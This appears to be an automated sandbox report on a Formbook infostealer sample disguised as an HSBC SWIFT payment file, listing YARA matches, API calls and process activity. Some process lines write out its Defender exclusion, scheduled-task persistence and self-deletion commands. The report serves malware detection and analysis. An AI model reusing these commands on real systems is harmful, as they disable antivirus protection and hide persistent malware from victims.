          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0541B150 appears 66 times
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: String function: 0189B150 appears 54 times
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004185D0 NtCreateFile,8_2_004185D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00418680 NtReadFile,8_2_00418680
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_00418700 NtClose,8_2_00418700
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004187B0 NtAllocateVirtualMemory,8_2_004187B0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004186FB NtClose,8_2_004186FB
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004187AA NtAllocateVirtualMemory,8_2_004187AA
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D99A0 NtCreateSection,LdrInitializeThunk,8_2_018D99A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_018D9910
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D98F0 NtReadVirtualMemory,LdrInitializeThunk,8_2_018D98F0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9840 NtDelayExecution,LdrInitializeThunk,8_2_018D9840
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9860 NtQuerySystemInformation,LdrInitializeThunk,8_2_018D9860
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9A00 NtProtectVirtualMemory,LdrInitializeThunk,8_2_018D9A00
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9A20 NtResumeThread,LdrInitializeThunk,8_2_018D9A20
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9A50 NtCreateFile,LdrInitializeThunk,8_2_018D9A50
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D95D0 NtClose,LdrInitializeThunk,8_2_018D95D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9540 NtReadFile,LdrInitializeThunk,8_2_018D9540
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9780 NtMapViewOfSection,LdrInitializeThunk,8_2_018D9780
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D97A0 NtUnmapViewOfSection,LdrInitializeThunk,8_2_018D97A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9FE0 NtCreateMutant,LdrInitializeThunk,8_2_018D9FE0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9710 NtQueryInformationToken,LdrInitializeThunk,8_2_018D9710
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D96E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_018D96E0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_018D9660
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D99D0 NtCreateProcessEx,8_2_018D99D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9950 NtQueueApcThread,8_2_018D9950
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D98A0 NtWriteVirtualMemory,8_2_018D98A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9820 NtEnumerateKey,8_2_018D9820
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018DB040 NtSuspendThread,8_2_018DB040
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018DA3B0 NtGetContextThread,8_2_018DA3B0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9B00 NtSetValueKey,8_2_018D9B00
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9A80 NtOpenDirectoryObject,8_2_018D9A80
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9A10 NtQuerySection,8_2_018D9A10
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D95F0 NtQueryInformationFile,8_2_018D95F0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9520 NtWaitForSingleObject,8_2_018D9520
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018DAD30 NtSetContextThread,8_2_018DAD30
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9560 NtWriteFile,8_2_018D9560
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018DA710 NtOpenProcessToken,8_2_018DA710
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9730 NtQueryVirtualMemory,8_2_018D9730
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9760 NtOpenProcess,8_2_018D9760
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018DA770 NtOpenThread,8_2_018DA770
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9770 NtSetInformationFile,8_2_018D9770
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D96D0 NtCreateKey,8_2_018D96D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9610 NtEnumerateValueKey,8_2_018D9610
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9650 NtQueryValueKey,8_2_018D9650
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D9670 NtQueryInformationProcess,8_2_018D9670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459540 NtReadFile,LdrInitializeThunk,20_2_05459540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054595D0 NtClose,LdrInitializeThunk,20_2_054595D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459710 NtQueryInformationToken,LdrInitializeThunk,20_2_05459710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459FE0 NtCreateMutant,LdrInitializeThunk,20_2_05459FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459780 NtMapViewOfSection,LdrInitializeThunk,20_2_05459780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459650 NtQueryValueKey,LdrInitializeThunk,20_2_05459650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05459660 NtAllocateVirtualMemory,LdrInitializeThunk,20_2_05459660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_054596D0 NtCreateKey,LdrInitializeThunk,20_2_054596D0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_054596E0 NtFreeVirtualMemory,LdrInitializeThunk,20_2_054596E0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459910 NtAdjustPrivilegesToken,LdrInitializeThunk,20_2_05459910
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_054599A0 NtCreateSection,LdrInitializeThunk,20_2_054599A0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459840 NtDelayExecution,LdrInitializeThunk,20_2_05459840
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459860 NtQuerySystemInformation,LdrInitializeThunk,20_2_05459860
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459A50 NtCreateFile,LdrInitializeThunk,20_2_05459A50
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459560 NtWriteFile,20_2_05459560
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459520 NtWaitForSingleObject,20_2_05459520
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_0545AD30 NtSetContextThread,20_2_0545AD30
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_054595F0 NtQueryInformationFile,20_2_054595F0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459760 NtOpenProcess,20_2_05459760
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_0545A770 NtOpenThread,20_2_0545A770
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459770 NtSetInformationFile,20_2_05459770
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_0545A710 NtOpenProcessToken,20_2_0545A710
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459730 NtQueryVirtualMemory,20_2_05459730
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_054597A0 NtUnmapViewOfSection,20_2_054597A0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459670 NtQueryInformationProcess,20_2_05459670
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459610 NtEnumerateValueKey,20_2_05459610
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459950 NtQueueApcThread,20_2_05459950
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_054599D0 NtCreateProcessEx,20_2_054599D0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_0545B040 NtSuspendThread,20_2_0545B040
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459820 NtEnumerateKey,20_2_05459820
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_054598F0 NtReadVirtualMemory,20_2_054598F0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_054598A0 NtWriteVirtualMemory,20_2_054598A0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459B00 NtSetValueKey,20_2_05459B00
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_0545A3B0 NtGetContextThread,20_2_0545A3B0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459A00 NtProtectVirtualMemory,20_2_05459A00
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459A10 NtQuerySection,20_2_05459A10
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459A20 NtResumeThread,20_2_05459A20
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_05459A80 NtOpenDirectoryObject,20_2_05459A80
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_00E485D0 NtCreateFile,20_2_00E485D0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_00E48680 NtReadFile,20_2_00E48680
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_00E487B0 NtAllocateVirtualMemory,20_2_00E487B0
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_00E48700 NtClose,20_2_00E48700
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_00E486FB NtClose,20_2_00E486FB
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_00E487AA NtAllocateVirtualMemory,20_2_00E487AA
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000000.343003231.0000000000C6E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUnmanagedMemoryAccess.exe. vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.386918351.0000000006480000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.476069084.0000000000F0E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUnmanagedMemoryAccess.exe. vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.478771184.0000000001B1F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.477765474.000000000198F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.479620363.0000000003930000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe Binary or memory string: OriginalFilenameUnmanagedMemoryAccess.exe. vs HSBC_SWIFT-20-11-2021.exe
          Source: HSBC_SWIFT-20-11-2021.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: RdffGefdbLSx.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe File read: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe:Zone.Identifier
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp
          Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Process created: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\explorer.exe explorer.exe
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe File created: C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe File created: C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp
          Source: classification engine Classification label: mal100.troj.evad.winEXE@17/12@0/0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4708:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4532:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_01
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Mutant created: \Sessions\1\BaseNamedObjects\GJVbibhyPBlryhb
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: HSBC_SWIFT-20-11-2021.exe String found in binary or memory: /UnmanagedMemoryAccess;component/views/addbook.xaml
          Source: HSBC_SWIFT-20-11-2021.exe String found in binary or memory: views/addbook.baml
          Source: HSBC_SWIFT-20-11-2021.exe String found in binary or memory: views/addcustomer.baml
          Source: HSBC_SWIFT-20-11-2021.exe String found in binary or memory: /UnmanagedMemoryAccess;component/views/addcustomer.xaml
          Source: HSBC_SWIFT-20-11-2021.exe String found in binary or memory: g/UnmanagedMemoryAccess;component/views/addbook.xaml}/UnmanagedMemoryAccess;component/views/borrowfrombookview.xamls/UnmanagedMemoryAccess;component/views/borrowingview.xamlm/UnmanagedMemoryAccess;component/views/changebook.xamlu/UnmanagedMemoryAccess;component/views/changecustomer.xamlq/UnmanagedMemoryAccess;component/views/customerview.xamlu/UnmanagedMemoryAccess;component/views/deletecustomer.xamlk/UnmanagedMemoryAccess;component/views/errorview.xamlo/UnmanagedMemoryAccess;component/views/smallextras.xamlo/UnmanagedMemoryAccess;component/views/addcustomer.xaml
          Source: HSBC_SWIFT-20-11-2021.exe String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
